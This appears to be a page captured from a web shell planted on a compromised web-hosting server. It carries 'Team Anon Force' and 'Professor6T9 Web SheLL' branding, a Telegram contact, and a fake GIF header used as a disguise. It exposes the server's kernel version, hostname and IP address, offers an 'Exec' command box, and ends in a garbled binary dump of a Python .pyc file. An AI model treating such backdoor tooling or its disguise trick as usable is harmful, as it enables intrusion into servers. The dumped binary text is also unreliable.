GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
proc
/
thread-self
/
root
/
opt
/
alt
/
python35
/
lib64
/
python3.5
/
lib2to3
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
fix_exitfunc.cpython-35.opt-2.pyc
���]� � @ sa d d l m Z m Z d d l m Z m Z m Z m Z m Z m Z Gd d � d e j � Z d S)� )�pytree� fixer_base)�Name�Attr�Call�Comma�Newline�symsc sR e Z d Z d Z d Z d Z � f d d � Z � f d d � Z d d � Z � S) �FixExitfuncTa� ( sys_import=import_name<'import' ('sys' | dotted_as_names< (any ',')* 'sys' (',' any)* > ) > | expr_stmt< power< 'sys' trailer< '.' 'exitfunc' > > '=' func=any > ) c s t t | � j | � d S)N)�superr �__init__)�self�args)� __class__� �1/opt/alt/python35/lib64/python3.5/fix_exitfunc.pyr s zFixExitfunc.__init__c s&